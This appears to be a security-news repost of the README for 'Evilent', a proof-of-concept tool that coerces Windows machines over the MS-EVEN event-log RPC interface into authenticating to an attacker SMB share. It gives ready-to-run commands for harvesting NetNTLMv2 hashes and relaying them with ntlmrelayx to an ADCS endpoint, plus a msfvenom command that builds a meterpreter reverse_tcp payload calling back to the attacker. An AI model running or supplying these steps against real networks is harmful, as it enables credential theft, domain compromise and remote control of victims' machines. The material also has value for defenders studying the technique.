Evilent PoC Exposes Windows Event Log Vulnerability, Leaking NetNTLMv2 Credentials via SMB Share

Evilent Coerce

A practical NTLM relay attack using the MS-EVEN RPC protocol and antivirus-assisted coercion.

Evilent is a PoC tool that triggers the ElfrOpenBELW procedure in the MS-EVEN RPC interface (used for Windows Event Log service), causing the target machine to connect to an attacker-controlled SMB share. If antivirus software (e.g., Defender) is present, it may scan the file and unintentionally leak NetNTLMv2 credentials, which can be relayed via ntlmrelayx.

This project includes:

  • evilent.py — triggers the MS-EVEN coercion
  • fefender.py — helper script to run impacket-smbserver and ntlmrelayx in parallel for harvesting and relaying credentials

This attack is a combination of previously known techniques:

  • MS-EVEN coercion (originally PoC’d in C by @evilashz)
  • NTLM leak through antivirus file scanning behavior
  • Credential relaying via impacket’s ntlmrelayx

Download

git clone https://github.com/Thunter-HackTeam/EvilentCoerce.git

Use

Step 1: Start listener (SMB + relay)

In one terminal:

python3 fefender.py
–smbserver-args=’Share ./ -smb2support’
–ntlmrelayx-args=’-smb2support -t http://192.168.140.218/certsrv/certfnsh.asp –adcs –keep-relaying’

This will launch both:

  • impacket-smbserver to serve the bait file
  • ntlmrelayx to relay NTLM authentication to a target (e.g., ADCS)

Step 2: Trigger the attack

In another terminal:

python3 evilent.py -backupfile Sharename\filename
domain/username:password@target listener

  • target: The victim machine (can be given as [domain/]username[:password]@<ip>)
  • Listener IP: IP of the attacker’s SMB server
  • -backupfile: Optional filename to request (msfvenom generate this file)

Notes

Notes

  • The attack works only in Active Directory environments.
  • Authentication often comes from NT AUTHORITY\LOCAL SERVICE, but antivirus activity may cause the host machine account to leak NetNTLMv2.
  • Exploitable file name variations (e.g., test.exeem䵌䵅P) must be prepared ahead on the SMB share.
  • Evilent.py generate exe file with MSFVenom (msfvenom -p windows/meterpreter/reverse_tcp LHOST={listen_ip} LPORT=4444 -f exe -o {name})
  • Environment variables like %USERNAME% may be expanded when referenced in UNC paths (e.g., \\attacker\%USERNAME%) — potential info leak.

Source: https://github.com/Thunter-HackTeam/

Support Our Threat Intelligence

If you find our technology report and cybersecurity news helpful, consider supporting our work.

Crypto QR Code
USDT (TRC20):
TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm
USDT (ERC20):
0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce